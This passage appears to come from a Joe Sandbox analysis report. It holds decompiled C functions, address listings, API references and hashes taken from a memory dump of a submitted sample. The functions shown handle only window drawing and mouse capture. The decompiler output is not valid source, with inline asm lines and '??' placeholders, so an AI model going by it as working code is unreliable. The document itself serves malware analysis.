						return E00DDD50E(_t292, _t339, _t357);
					}
				}
				_t299 =  *((intOrPtr*)(_t339 + 0x334));
				if( *((intOrPtr*)(_t291 + 0x34)) >= _t299) {
					goto L77;
				}
				if( *((intOrPtr*)(_t291 + 0x3c)) <  *((intOrPtr*)(_t339 + 0x32c))) {
					goto L70;
				}
				_t337 =  *(_t339 + 0x328);
				_t202 =  *((intOrPtr*)(_t339 + 0x358)) + _t337;
				 *(_t378 - 0x6c) =  *(_t378 - 0x6c) | 0xffffffff;
				 *(_t378 - 0x68) = _t202;
				if( *((intOrPtr*)(_t339 + 0x308)) == 0) {
					L18:
					if( *((intOrPtr*)(_t291 + 0x64)) == 0) {
						 *0xe17a64( *((intOrPtr*)(E00CC19ED() + 0x38)));
						 *(_t378 - 0x6c) =  *((intOrPtr*)( *((intOrPtr*)( *_t357 + 0x30))))();
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *((intOrPtr*)(_t291 + 0x5c)) == 0 ||  *((intOrPtr*)(_t291 + 0x6c)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x58)) + 0x398)) == 0) {
						 *0xe17a64();
						if( *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x9c))))() != 0) {
							 *(_t378 - 0x18) =  *(_t378 - 0x68);
						}
					}
					if( *((intOrPtr*)(_t291 + 0x5c)) == 0) {
						 *0xe17a64();
						_t208 =  *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x9c))))();
						__eflags = _t208;
						if(_t208 != 0) {
							goto L47;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)(_t378 - 0x2c)) =  *((intOrPtr*)(_t378 - 0x1c)) + 1;
						_t250 =  *((intOrPtr*)(_t378 - 0x58)) + 0x3fc;
						__eflags = _t250;
						if(_t250 == 0) {
							L43:
							_t252 = E00CC19ED() + 0xc8;
							__eflags = _t252;
							if(_t252 != 0) {
								_t252 =  *((intOrPtr*)(_t252 + 4));
							}
							_push(_t252);
							L46:
							FillRect( *( *((intOrPtr*)(_t378 - 0x54)) + 4), _t378 - 0x30, ??);
							goto L47;
						}
						__eflags =  *((intOrPtr*)(_t250 + 4));
						if( *((intOrPtr*)(_t250 + 4)) == 0) {
							goto L43;
						}
						_push( *((intOrPtr*)(_t250 + 4)));
						goto L46;
					} else {
						_t326 =  *((intOrPtr*)(_t378 - 0x58));
						if( *((intOrPtr*)(_t326 + 0x398)) != 0 &&  *((intOrPtr*)(_t326 + 0x308)) == 0 &&  *((intOrPtr*)(_t291 + 0x6c)) == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *((intOrPtr*)(_t378 - 0x2c)) =  *((intOrPtr*)(_t378 - 0x1c)) + 1;
							_t332 = _t326 + 0x3fc;
							if(_t332 == 0 ||  *((intOrPtr*)(_t332 + 4)) == 0) {
								_t271 = E00CC19ED() + 0xc8;
								__eflags = _t271;
								if(_t271 != 0) {
									_t271 =  *((intOrPtr*)(_t271 + 4));
								}
								_push(_t271);
							} else {
								_push( *((intOrPtr*)(_t332 + 4)));
							}
							FillRect( *( *((intOrPtr*)(_t378 - 0x54)) + 4), _t378 - 0x30, ??);
							_t326 =  *((intOrPtr*)(_t378 - 0x58));
						}
						_t257 =  *(_t378 - 0x20) +  *((intOrPtr*)(_t326 + 0x354));
						 *(_t378 - 0x60) =  *(_t378 - 0x60) & 0x00000000;
						asm("movsd");
						 *(_t378 - 0x64) = 0xe1a644;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t378 - 0x20) = _t257;
						 *(_t378 - 0x74) = _t257;
						 *(_t378 - 4) =  *(_t378 - 4) & 0x00000000;
						_t258 =  *((intOrPtr*)(_t326 + 0x334));
						_t351 = _t378 - 0x40;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if( *(_t378 - 0x70) >= _t258) {
							 *((intOrPtr*)(_t378 - 0x34)) = _t258;
						}
						E00CB9BC6(_t291, _t378 - 0x64, _t351, CreateRectRgnIndirect(_t378 - 0x40));
						E00CBA1B1( *((intOrPtr*)(_t378 - 0x54)), _t378 - 0x64);
						_t379 = _t379 - 0x10;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *0xe17a64( *((intOrPtr*)(_t378 - 0x54)));
						 *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x18))))();
						 *(_t378 - 0x64) = 0xe1a644;
						E00CB91F0(_t378 - 0x64, _t337);
						_t291 =  *((intOrPtr*)(_t378 - 0x5c));
						L47:
						if( *(_t378 - 0x18) >  *(_t378 - 0x20)) {
							 *(_t378 - 0x70) =  *(_t378 - 0x70) & 0x00000000;
							 *(_t378 - 0x74) = 0xe1a644;
							 *(_t378 - 4) = 1;
							_t346 = _t378 - 0x40;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t366 =  *((intOrPtr*)(_t378 - 0x58));
							_t234 =  *((intOrPtr*)(_t366 + 0x334));
							if( *((intOrPtr*)(_t378 - 0x14)) >= _t234) {
								 *((intOrPtr*)(_t378 - 0x34)) = _t234;
							}
							E00CB9BC6(_t291, _t378 - 0x74, _t346, CreateRectRgnIndirect(_t378 - 0x40));
							_t347 =  *((intOrPtr*)(_t378 - 0x54));
							E00CBA1B1(_t347, _t378 - 0x74);
							_t240 = 0;
							 *(_t378 - 0x60) = 0;
							if( *((intOrPtr*)(_t291 + 0x5c)) != 0 &&  *((intOrPtr*)(_t291 + 0x6c)) == 0) {
								_t325 = 0;
								_t369 = _t366 + 0x320;
								if(_t369 != 0) {
									_t325 =  *(_t369 + 4);
								}
								if(_t347 != 0) {
									_t240 =  *(_t347 + 4);
								}
								 *(_t378 - 0x60) = SelectObject(_t240, _t325);
							}
							_t379 = _t379 - 0x10;
							_t291 =  *((intOrPtr*)( *_t291 + 0x10));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t368 =  *((intOrPtr*)(_t378 - 0x54));
							 *0xe17a64(_t368);
							 *_t291();
							_t323 =  *(_t378 - 0x60);
							if(_t323 != 0) {
								if(_t368 != 0) {
									_t244 =  *(_t368 + 4);
								} else {
									_t244 = 0;
								}
								SelectObject(_t244, _t323);
							}
							 *(_t378 - 0x74) = 0xe1a644;
							E00CB91F0(_t378 - 0x74, _t337);
						}
						 *(_t378 - 0x80) =  *(_t378 - 0x80) & 0x00000000;
						 *(_t378 - 0x84) = 0xe1a644;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t378 - 0x20) =  *(_t378 - 0x68) + 1;
						_t342 = _t378 - 0x50;
						 *(_t378 - 4) = 2;
						asm("movsd");
						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x58)) + 0x334));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if( *((intOrPtr*)(_t378 - 0x14)) >= _t213) {
							 *((intOrPtr*)(_t378 - 0x44)) = _t213;
						}
						E00CB9BC6(_t291, _t378 - 0x84, _t342, CreateRectRgnIndirect(_t378 - 0x50));
						E00CBA1B1( *((intOrPtr*)(_t378 - 0x54)), _t378 - 0x84);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t357 =  *((intOrPtr*)(_t378 - 0x54));
						 *0xe17a64(_t357);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x5c)))) + 0x14))))();
						_t291 =  *((intOrPtr*)(_t378 - 0x5c));
						if(IsRectEmpty(_t291 + 0x40) == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t357 =  *((intOrPtr*)(_t378 - 0x54));
							 *0xe17a64(_t357);
							 *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x1c))))();
							_t291 =  *((intOrPtr*)(_t378 - 0x5c));
						}
						E00CBA1B1(_t357, 0);
						_t339 =  *((intOrPtr*)(_t378 - 0x58));
						E00CB9F54(_t357, _t378 - 0x74,  *(_t339 + 0x328),  *((intOrPtr*)(_t291 + 0x3c)));
						E00CB9F1F(_t357,  *((intOrPtr*)(_t339 + 0x330)),  *((intOrPtr*)(_t291 + 0x3c)));
						_t312 =  *(_t378 - 0x6c);
						if(_t312 != 0xffffffff) {
							_t357 =  *((intOrPtr*)( *_t357 + 0x30));
							 *0xe17a64(_t312);
							 *_t357();
						}
						 *(_t378 - 4) =  *(_t378 - 4) | 0xffffffff;
						 *(_t378 - 0x84) = 0xe1a644;
						E00CB91F0(_t378 - 0x84, _t337);
						goto L70;
					}
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t377 =  *(_t378 - 0x20);
				if( *((intOrPtr*)(_t291 + 0x5c)) != 0) {
					_t282 =  *(_t378 - 0x18);
					L9:
					if( *((intOrPtr*)(_t291 + 0x6c)) != 0) {
						_t282 =  *((intOrPtr*)(_t378 - 0x14)) -  *((intOrPtr*)(_t378 - 0x1c)) + _t377;
						 *(_t378 - 0x18) = _t282;
					}
					 *(_t378 - 0x20) = _t337;
					if( *((intOrPtr*)(_t378 - 0x14)) >= _t299) {
						 *((intOrPtr*)(_t378 - 0x14)) = _t299;
					}
					if(_t337 >= _t282) {
						_t357 =  *((intOrPtr*)(_t378 - 0x54));
					} else {
						_t355 =  *((intOrPtr*)(_t378 - 0x58));
						_t283 =  *((intOrPtr*)(_t355 + 0x3e8));
						_t393 = _t283 - 0xffffffff;
						if(_t283 == 0xffffffff) {
							_t283 =  *((intOrPtr*)(_t355 + 0x3dc));
						}
						_push(_t283);
						E00CB8F99(_t378 - 0x90, _t337, _t355, _t377, _t393);
						_t357 =  *((intOrPtr*)(_t378 - 0x54));
						FillRect( *(_t357 + 4), _t378 - 0x20,  *(_t378 - 0x8c));
						 *((intOrPtr*)(_t378 - 0x90)) = 0xe1966c;
						E00CB91F0(_t378 - 0x90, _t337);
					}
					goto L18;
				}
				if(_t202 >= _t377) {
					_t282 = _t377;
				}
				 *(_t378 - 0x18) = _t282;
				goto L9;
			}

0x00cceb01
0x00cceb0b
0x00cceb10
0x00cceb12
0x00cceb15
0x00cceb18
0x00cceb1b
0x00cceb1e
0x00cceb21
0x00cceb25
0x00cceb33
0x00ccefc8
0x00ccefcc
0x00ccefd7
0x00ccefff
0x00ccefe4
0x00ccefe9
0x00cceff1
0x00cceff9
0x00cceffb
0x00cceffd
0x00ccf00e
0x00000000
0x00ccf00e
0x00cceffd
0x00000000
0x00ccf003
0x00ccf003
0x00ccf006
0x00ccf00b
0x00ccf00b
0x00ccefcc
0x00cceb39
0x00cceb42
0x00000000
0x00000000
0x00cceb51
0x00000000
0x00000000
0x00cceb5d
0x00cceb63
0x00cceb65
0x00cceb70
0x00cceb73
0x00ccec0c
0x00ccec10
0x00ccec22
0x00ccec2d
0x00ccec2d
0x00ccec3a
0x00ccec3b
0x00ccec3c
0x00ccec3d
0x00ccec3e
0x00ccec5c
0x00ccec68
0x00ccec6d
0x00ccec6d
0x00ccec68
0x00ccec74
0x00cced7a
0x00cced82
0x00cced84
0x00cced86
0x00000000
0x00000000
0x00cced92
0x00cced93
0x00cced94
0x00cced95
0x00cced96
0x00cced9c
0x00cced9c
0x00cceda1
0x00ccedae
0x00ccedb3
0x00ccedb3
0x00ccedb8
0x00ccedba
0x00ccedba
0x00ccedbd
0x00ccedbe
0x00ccedc8
0x00000000
0x00ccedc8
0x00cceda3
0x00cceda7
0x00000000
0x00000000
0x00cceda9
0x00000000
0x00ccec7a
0x00ccec7a
0x00ccec84
0x00ccec9f
0x00cceca0
0x00cceca1
0x00cceca2
0x00cceca3
0x00cceca6
0x00ccecac
0x00ccecbe
0x00ccecbe
0x00ccecc3
0x00ccecc5
0x00ccecc5
0x00ccecc8
0x00ccecb4
0x00ccecb4
0x00ccecb4
0x00ccecd3
0x00ccecd9
0x00ccecd9
0x00ccece2
0x00cceceb
0x00ccecef
0x00ccecf0
0x00ccecf7
0x00ccecf8
0x00ccecf9
0x00ccecfa
0x00ccecfd
0x00cced00
0x00cced07
0x00cced0d
0x00cced10
0x00cced11
0x00cced12
0x00cced13
0x00cced17
0x00cced19
0x00cced19
0x00cced2a
0x00cced36
0x00cced40
0x00cced4d
0x00cced4e
0x00cced4f
0x00cced50
0x00cced51
0x00cced5a
0x00cced5f
0x00cced66
0x00cced6b
0x00ccedce
0x00ccedd4
0x00ccedda
0x00ccedde
0x00ccede8
0x00ccedef
0x00ccedf2
0x00ccedf3
0x00ccedf4
0x00ccedf5
0x00ccedf6
0x00ccedf9
0x00ccee02
0x00ccee04
0x00ccee04
0x00ccee15
0x00ccee1a
0x00ccee23
0x00ccee28
0x00ccee2a
0x00ccee30
0x00ccee37
0x00ccee39
0x00ccee3f
0x00ccee41
0x00ccee41
0x00ccee46
0x00ccee48
0x00ccee48
0x00ccee53
0x00ccee53
0x00ccee5b
0x00ccee60
0x00ccee65
0x00ccee66
0x00ccee67
0x00ccee68
0x00ccee69
0x00ccee6d
0x00ccee76
0x00ccee78
0x00ccee7d
0x00ccee81
0x00ccee87
0x00ccee83
0x00ccee83
0x00ccee83
0x00ccee8c
0x00ccee8c
0x00ccee95
0x00ccee9c
0x00ccee9c
0x00cceead
0x00cceeb2
0x00cceebc
0x00cceebd
0x00cceebe
0x00cceebf
0x00cceec0
0x00cceec9
0x00cceecc
0x00cceed3
0x00cceed4
0x00cceeda
0x00cceedb
0x00cceedc
0x00cceee0
0x00cceee2
0x00cceee2
0x00cceef6
0x00ccef05
0x00ccef17
0x00ccef1d
0x00ccef1e
0x00ccef1f
0x00ccef20
0x00ccef24
0x00ccef2d
0x00ccef2f
0x00ccef3e
0x00ccef4e
0x00ccef4f
0x00ccef50
0x00ccef51
0x00ccef52
0x00ccef56
0x00ccef5f
0x00ccef61
0x00ccef61
0x00ccef68
0x00ccef70
0x00ccef7f
0x00ccef8f
0x00ccef94
0x00ccef9a
0x00ccef9f
0x00ccefa4
0x00ccefad
0x00ccefad
0x00ccefaf
0x00ccefb9
0x00ccefc3
0x00000000
0x00ccefc3
0x00ccec74
0x00cceb83
0x00cceb84
0x00cceb85
0x00cceb86
0x00cceb87
0x00cceb8a
0x00cceb99
0x00cceb9c
0x00cceba0
0x00cceba8
0x00ccebaa
0x00ccebaa
0x00ccebad
0x00ccebb3
0x00ccebb5
0x00ccebb5
0x00ccebba
0x00ccec09
0x00ccebbc
0x00ccebbc
0x00ccebbf
0x00ccebc5
0x00ccebc8
0x00ccebca
0x00ccebca
0x00ccebd0
0x00ccebd7
0x00ccebe2
0x00ccebec
0x00ccebf8
0x00ccec02
0x00ccec02
0x00000000
0x00ccebba
0x00cceb8e
0x00cceb95
0x00cceb95
0x00cceb90
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCEB0B
IsRectEmpty.USER32 ref: 00CCEB2B
FillRect.USER32 ref: 00CCEBEC
FillRect.USER32 ref: 00CCECD3
CreateRectRgnIndirect.GDI32(?), ref: 00CCED20
FillRect.USER32 ref: 00CCEDC8
CreateRectRgnIndirect.GDI32(?), ref: 00CCEE0B
SelectObject.GDI32(00000000,00000000), ref: 00CCEE4D
SelectObject.GDI32(00000001,?), ref: 00CCEE8C
CreateRectRgnIndirect.GDI32(?), ref: 00CCEEE9
IsRectEmpty.USER32 ref: 00CCEF36

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$CreateFillIndirect$EmptyObjectSelect$H_prolog3_
String ID:
API String ID: 1355431164-0
Opcode ID: d9ae0c4bc674ab647b8f480d042132eb24e03616a870014c53f72ac618c80634
Instruction ID: 6a7dc876a682a06a78f3e487d4e6e3af70d8c6062001f78ea7c4714b1c4f1a48
Opcode Fuzzy Hash: d9ae0c4bc674ab647b8f480d042132eb24e03616a870014c53f72ac618c80634
Instruction Fuzzy Hash: 79021631A00619CFCF15DFA4C984BEEB7B6BF09304F144069E916AB251DB75AE45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD2DB Relevance: 16.8, APIs: 11, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CFD2DB(int __ecx, int __edx, void* __eflags, struct tagPOINT _a8, int _a12) {
				signed int _v8;
				struct tagRECT _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t85;
				int _t89;
				int _t93;
				int _t97;
				int _t125;
				int _t129;
				void* _t142;
				void* _t147;
				int _t148;
				int _t152;
				int _t176;
				int _t183;
				int _t184;
				signed int _t190;

				_t183 = __edx;
				_t85 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t85 ^ _t190;
				_t184 = __ecx;
				E00CB236A(_t147, __ecx, __eflags);
				_push(_a12);
				_t148 =  *(_t184 + 0x114);
				_t185 =  *(_t184 + 0x1f8);
				_t89 = PtInRect(_t184 + 0x200, _a8.x);
				 *(_t184 + 0x1f8) = _t89;
				if( *(_t184 + 0x1f8) != _t89) {
					RedrawWindow( *(_t184 + 0x20), _t184 + 0x200, 0, 0x105);
				}
				if( *(_t184 + 0x114) < 0 ||  *(_t184 + 0x118) >= 0 ||  *(_t184 + 0x158) != 0) {
					L8:
					_t185 =  *( *_t184 + 0x218);
					 *0xe17a64( &_a8);
					_t93 =  *( *( *_t184 + 0x218))();
					_t183 =  *(_t184 + 0x118);
					_t152 = _t93;
					 *(_t184 + 0x114) = _t93;
					__eflags = _t183;
					if(_t183 >= 0) {
						__eflags = _t93 - _t183;
						if(_t93 != _t183) {
							 *(_t184 + 0x114) =  *(_t184 + 0x114) | 0xffffffff;
							_t152 = _t152 | 0xffffffff;
							__eflags = _t152;
						}
					}
					__eflags = _t152 - _t148;
					if(_t152 == _t148) {
						L26:
						__eflags =  *(_t184 + 0x158);
						if( *(_t184 + 0x158) == 0) {
							goto L38;
						}
						_t148 =  *(_t184 + 0xbc);
						 *0xe17a64(_a8.x, _a12);
						_t97 =  *( *( *_t184 + 0x164))();
						__eflags = _t97;
						if(_t97 == 0) {
							L34:
							_t185 =  *( *_t184 + 0x164);
							 *0xe17a64(_a8.x, _a12);
							_t93 =  *( *( *_t184 + 0x164))();
							__eflags = _t93;
							if(_t93 == 0) {
								_t185 =  *( *_t184 + 0x1a0);
								 *0xe17a64(1, 0xffffffff, 0);
								_t93 =  *( *( *_t184 + 0x1a0))();
								__eflags = _t93;
								if(_t93 != 0) {
									__eflags = _t148 - 2;
									if(_t148 > 2) {
										_t82 = _t184 + 0x158;
										 *_t82 =  *(_t184 + 0x158) & 0x00000000;
										__eflags =  *_t82;
									}
								}
							}
							goto L38;
						}
						__eflags = _t148 - 1;
						if(_t148 <= 1) {
							goto L34;
						}
						__eflags =  *(_t184 + 0x128);
						if( *(_t184 + 0x128) == 0) {
							goto L34;
						} else {
							_v40 = 0;
							_v36 = 0;
							_v32 = 0;
							_v28 = 0;
							_t185 =  *( *_t184 + 0x218);
							 *0xe17a64( &_a8);
							_t148 =  *( *( *_t184 + 0x218))();
							_t93 =  *(_t184 + 0xc0);
							__eflags = _t148 - _t93;
							if(_t148 != _t93) {
								__eflags = _t148 - 0xffffffff;
								if(_t148 != 0xffffffff) {
									 *0xe17a64(_t148, _t93);
									 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 0x260))))();
									 *0xe17a64();
									 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 0x184))))();
									 *0xe17a64(_t148);
									 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 0x214))))();
									_t185 =  *( *_t184 + 0x218);
									 *0xe17a64( &_a8);
									_t93 =  *( *( *_t184 + 0x218))();
									__eflags = _t93 - _t148;
									if(_t93 != _t148) {
										_t185 =  *( *_t184 + 0x1b8);
										 *0xe17a64(_t148,  &_v40);
										 *( *( *_t184 + 0x1b8))();
										_v24.right.x =  *((intOrPtr*)(_t184 + 0x164)) + _v40;
										_v24.bottom = _a12;
										ClientToScreen( *(_t184 + 0x20),  &(_v24.right));
										_t93 = SetCursorPos(_v24.right.x, _v24.bottom);
									}
								}
							}
							goto L38;
						}
					}
					_t185 = 0;
					__eflags =  *(_t184 + 0x88);
					if( *(_t184 + 0x88) != 0) {
						L15:
						_t125 =  *(_t184 + 0x114);
						__eflags = _t148;
						if(_t148 >= 0) {
							__eflags = _t125;
							if(_t125 < 0) {
								__eflags =  *(_t184 + 0x118) - _t185;
								if( *(_t184 + 0x118) < _t185) {
									 *(_t184 + 0x1f8) = _t185;
									 *(_t184 + 0x1fc) = _t185;
									__eflags =  *(_t184 + 0x158) - _t185;
									if( *(_t184 + 0x158) == _t185) {
										ReleaseCapture();
									}
								}
							}
						} else {
							__eflags = _t125;
							if(_t125 >= 0) {
								E00CB277F(_t148, _t152, _t183, SetCapture( *(_t184 + 0x20)));
							}
						}
						_t176 =  *(_t184 + 0x114);
						__eflags = _t176;
						if(_t176 >= 0) {
							_v24.left = _t185;
							_v24.top = _t185;
							_v24.right.x = _t185;
							_v24.bottom = _t185;
							_t185 =  *( *_t184 + 0x1b8);
							 *0xe17a64(_t176,  &_v24);
							_t129 =  *( *( *_t184 + 0x1b8))();
							__eflags = _t129;
							if(_t129 != 0) {
								InvalidateRect( *(_t184 + 0x20),  &_v24, 1);
								UpdateWindow( *(_t184 + 0x20));
							}
						}
						_t93 = E00CFC65E(_t184, _t148);
						goto L26;
					}
					_t185 =  *( *_t184 + 0x284);
					 *0xe17a64();
					_t152 = _t184;
					_t93 =  *( *( *_t184 + 0x284))();
					__eflags = _t93;
					if(_t93 == 0) {
						goto L26;
					} else {
						_t185 = 0;
						__eflags = 0;
						goto L15;
					}
				} else {
					_v24.right.x = _a8;
					_v24.bottom = _a12;
					ClientToScreen( *(_t184 + 0x20),  &(_v24.right));
					_push(_v24.bottom);
					_t142 = E00CB277F(_t148, _a12, _t183, WindowFromPoint(_v24.right));
					if(_t142 == 0 ||  *((intOrPtr*)(_t142 + 0x20)) ==  *(_t184 + 0x20)) {
						goto L8;
					} else {
						ReleaseCapture();
						 *(_t184 + 0x114) =  *(_t184 + 0x114) | 0xffffffff;
						_t93 = E00CFC65E(_t184, _t148);
						L38:
						return E00DDCBCE(_t93, _t148, _v8 ^ _t190, _t183, _t184, _t185);
					}
				}
			}

0x00cfd2db
0x00cfd2e1
0x00cfd2e8
0x00cfd2ee
0x00cfd2f0
0x00cfd2f5
0x00cfd2f8
0x00cfd307
0x00cfd30e
0x00cfd314
0x00cfd31c
0x00cfd32f
0x00cfd32f
0x00cfd33c
0x00cfd3a1
0x00cfd3a3
0x00cfd3af
0x00cfd3b7
0x00cfd3b9
0x00cfd3bf
0x00cfd3c1
0x00cfd3c7
0x00cfd3c9
0x00cfd3cb
0x00cfd3cd
0x00cfd3cf
0x00cfd3d6
0x00cfd3d6
0x00cfd3d6
0x00cfd3cd
0x00cfd3d9
0x00cfd3db
0x00cfd4a1
0x00cfd4a1
0x00cfd4a8
0x00000000
0x00000000
0x00cfd4b3
0x00cfd4c4
0x00cfd4cc
0x00cfd4ce
0x00cfd4d0
0x00cfd5cf
0x00cfd5d7
0x00cfd5df
0x00cfd5e7
0x00cfd5e9
0x00cfd5eb
0x00cfd5f5
0x00cfd5fd
0x00cfd605
0x00cfd607
0x00cfd609
0x00cfd60b
0x00cfd60e
0x00cfd610
0x00cfd610
0x00cfd610
0x00cfd610
0x00cfd60e
0x00cfd609
0x00000000
0x00cfd5eb
0x00cfd4d6
0x00cfd4d9
0x00000000
0x00000000
0x00cfd4e1
0x00cfd4e7
0x00000000
0x00cfd4ed
0x00cfd4ed
0x00cfd4f0
0x00cfd4f3
0x00cfd4f6
0x00cfd4fb
0x00cfd507
0x00cfd511
0x00cfd513
0x00cfd519
0x00cfd51b
0x00cfd521
0x00cfd524
0x00cfd536
0x00cfd53e
0x00cfd54a
0x00cfd552
0x00cfd55f
0x00cfd567
0x00cfd56b
0x00cfd577
0x00cfd57f
0x00cfd581
0x00cfd583
0x00cfd590
0x00cfd598
0x00cfd5a0
0x00cfd5ae
0x00cfd5b8
0x00cfd5bb
0x00cfd5c7
0x00cfd5c7
0x00cfd583
0x00cfd524
0x00000000
0x00cfd51b
0x00cfd4e7
0x00cfd3e1
0x00cfd3e3
0x00cfd3e9
0x00cfd409
0x00cfd409
0x00cfd40f
0x00cfd411
0x00cfd428
0x00cfd42a
0x00cfd42c
0x00cfd432
0x00cfd434
0x00cfd43a
0x00cfd440
0x00cfd446
0x00cfd448
0x00cfd448
0x00cfd446
0x00cfd432
0x00cfd413
0x00cfd413
0x00cfd415
0x00cfd421
0x00cfd421
0x00cfd415
0x00cfd44e
0x00cfd454
0x00cfd456
0x00cfd45a
0x00cfd45d
0x00cfd460
0x00cfd463
0x00cfd466
0x00cfd473
0x00cfd47b
0x00cfd47d
0x00cfd47f
0x00cfd48a
0x00cfd493
0x00cfd493
0x00cfd47f
0x00cfd49c
0x00000000
0x00cfd49c
0x00cfd3ed
0x00cfd3f5
0x00cfd3fb
0x00cfd3fd
0x00cfd3ff
0x00cfd401
0x00000000
0x00cfd407
0x00cfd407
0x00cfd407
0x00000000
0x00cfd407
0x00cfd350
0x00cfd356
0x00cfd360
0x00cfd363
0x00cfd369
0x00cfd376
0x00cfd37d
0x00000000
0x00cfd387
0x00cfd387
0x00cfd38d
0x00cfd397
0x00cfd617
0x00cfd625
0x00cfd625
0x00cfd37d

APIs

PtInRect.USER32(?,?,?), ref: 00CFD30E
RedrawWindow.USER32(?,?,00000000,00000105), ref: 00CFD32F
ClientToScreen.USER32(?,?), ref: 00CFD363
WindowFromPoint.USER32(?,?), ref: 00CFD36F
ReleaseCapture.USER32(00000000), ref: 00CFD387
SetCapture.USER32(?), ref: 00CFD41A
ReleaseCapture.USER32 ref: 00CFD448
InvalidateRect.USER32(?,?,00000001), ref: 00CFD48A
UpdateWindow.USER32(?), ref: 00CFD493
ClientToScreen.USER32(?,?), ref: 00CFD5BB
SetCursorPos.USER32(?,?), ref: 00CFD5C7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CaptureWindow$ClientRectReleaseScreen$CursorFromInvalidatePointRedrawUpdate
String ID:
API String ID: 1209641013-0
Opcode ID: 7a8430e7f0035040c0722ab1eb78a17d70ed4662161e970a6de82ecf1abdf8d7
Instruction ID: ce412c79e8ad11640dd87f155f61a18ce503d485061dfb80f94847c1e71e8167
Opcode Fuzzy Hash: 7a8430e7f0035040c0722ab1eb78a17d70ed4662161e970a6de82ecf1abdf8d7
Instruction Fuzzy Hash: 42A1923570061AEFCB49DF65C888AFDBBB6BF48710F144165E926E3250DB30AA54CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00D04B8E Relevance: 16.7, APIs: 11, Instructions: 152
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00D04B8E(int __ecx, void* __edx, void* __edi, void* __esi, int _a4, struct tagPOINT _a8, signed int _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				RECT* _v44;
				intOrPtr* _v48;
				void* __ebx;
				signed int _t47;
				RECT* _t67;
				int _t68;
				long _t71;
				int _t74;
				int _t84;
				long _t95;
				void* _t104;
				RECT* _t106;
				intOrPtr* _t108;
				long _t112;
				signed int _t117;

				_t109 = __esi;
				_t105 = __edi;
				_t104 = __edx;
				_t85 = __ecx;
				_t47 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t47 ^ _t117;
				_push(_a12);
				_t84 = __ecx;
				_v48 = __ecx;
				if(PtInRect(__ecx + 0x2bc, _a8.x) == 0) {
					__eflags =  *(_t84 + 0x29f8);
					_push(__esi);
					_push(__edi);
					if( *(_t84 + 0x29f8) == 0) {
						L7:
						 *0xe17a64();
						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x2f0))))();
						if(__eflags != 0) {
							 *0xe17a64( &_a8);
							__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x218))))() -  *((intOrPtr*)(_t84 + 0xc0));
							if(__eflags == 0) {
								E00D01CAB(_t84, _t65);
							}
						}
